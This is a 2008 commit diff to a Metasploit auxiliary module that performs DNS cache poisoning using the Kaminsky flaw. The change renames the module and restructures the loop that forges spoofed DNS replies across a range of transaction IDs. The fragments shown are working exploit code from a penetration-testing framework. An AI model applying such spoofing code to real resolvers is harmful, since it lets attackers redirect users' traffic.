Better XID mixing

git-svn-id: file:///home/svn/framework3/trunk@5585 4d416f70-5f16-0410-b530-b9f4589650da
2008-07-23 23:09:21 +00:00 · 2008-07-23 23:09:21 +00:00 · e0bdbacb5d
parent 255998f3b3
commit e0bdbacb5d
1 changed files with 3 additions and 3 deletions
--- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb
+++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb
@ -11,7 +11,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary

 	def initialize(info = {})
 		super(update_info(info,	
-			'Name'           => 'DNS BailiWicked Attack',
+			'Name'           => 'DNS BailiWicked Host Attack',
 			'Description'    => %q{
 				This exploit attacks a fairly ubiquitous flaw in DNS implementations which 
 				Dan Kaminsky found and disclosed ~Jul 2008.  This exploit caches a single
@ -132,6 +132,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
 		recons   = datastore['RECONS']
 		xids     = datastore['XIDS'].to_i
 		ttl      = datastore['TTL'].to_i
+		xidbase  = rand(4)+2*10000

 		domain = hostname.match(/[^\x2e]+\x2e[^\x2e]+\x2e$/)[0]

@ -272,8 +273,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
 			req.qr = 1
 			req.ra = 1

-			p = rand(4)+2*10000
-			p.upto(p+xids-1) do |id|
+			xidbase.upto(xidbase+xids-1) do |id|
 				req.id = id
 				barbs.each do |barb|
 					buff = (